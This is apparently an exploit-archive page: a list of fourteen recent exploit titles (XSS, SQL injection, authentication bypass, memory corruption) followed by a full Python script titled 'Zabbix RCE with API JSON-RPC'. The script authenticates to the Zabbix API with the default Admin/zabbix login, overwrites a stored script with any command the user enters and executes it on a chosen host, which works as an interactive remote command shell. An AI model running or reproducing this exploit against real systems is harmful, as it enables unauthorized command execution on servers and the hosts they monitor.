264d15855e
14 new exploits FRticket Ticket System - Stored XSS Viart Shopping Cart 5.0 - CSRF Shell Upload Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass Dream Gallery 2.0 - Admin Panel Authentication Bypass Grid Gallery 1.0 - Admin Panel Authentication Bypass Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection Zabbix 2.2 - 3.0.3 - RCE with API JSON-RPC iSQL 1.0 - Shell Command Injection iSQL 1.0 - isql_main.c Buffer Overflow PoC Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption
75 lines
No EOL
1.7 KiB
Python
Executable file
75 lines
No EOL
1.7 KiB
Python
Executable file
#!/usr/bin/env python
|
|
# -*- coding: utf-8 -*-
|
|
|
|
# Exploit Title: Zabbix RCE with API JSON-RPC
|
|
# Date: 06-06-2016
|
|
# Exploit Author: Alexander Gurin
|
|
# Vendor Homepage: http://www.zabbix.com
|
|
# Software Link: http://www.zabbix.com/download.php
|
|
# Version: 2.2 - 3.0.3
|
|
# Tested on: Linux (Debian, CentOS)
|
|
# CVE : N/A
|
|
|
|
import requests
|
|
import json
|
|
import readline
|
|
|
|
ZABIX_ROOT = 'http://192.168.66.2' ### Zabbix IP-address
|
|
url = ZABIX_ROOT + '/api_jsonrpc.php' ### Don't edit
|
|
|
|
login = 'Admin' ### Zabbix login
|
|
password = 'zabbix' ### Zabbix password
|
|
hostid = '10084' ### Zabbix hostid
|
|
|
|
### auth
|
|
payload = {
|
|
"jsonrpc" : "2.0",
|
|
"method" : "user.login",
|
|
"params": {
|
|
'user': ""+login+"",
|
|
'password': ""+password+"",
|
|
},
|
|
"auth" : None,
|
|
"id" : 0,
|
|
}
|
|
headers = {
|
|
'content-type': 'application/json',
|
|
}
|
|
|
|
auth = requests.post(url, data=json.dumps(payload), headers=(headers))
|
|
auth = auth.json()
|
|
|
|
while True:
|
|
cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
|
|
if cmd == "" : print "Result of last command:"
|
|
if cmd == "quit" : break
|
|
|
|
### update
|
|
payload = {
|
|
"jsonrpc": "2.0",
|
|
"method": "script.update",
|
|
"params": {
|
|
"scriptid": "1",
|
|
"command": ""+cmd+""
|
|
},
|
|
"auth" : auth['result'],
|
|
"id" : 0,
|
|
}
|
|
|
|
cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))
|
|
|
|
### execute
|
|
payload = {
|
|
"jsonrpc": "2.0",
|
|
"method": "script.execute",
|
|
"params": {
|
|
"scriptid": "1",
|
|
"hostid": ""+hostid+""
|
|
},
|
|
"auth" : auth['result'],
|
|
"id" : 0,
|
|
}
|
|
|
|
cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))
|
|
cmd_exe = cmd_exe.json()
|
|
print cmd_exe["result"]["value"] |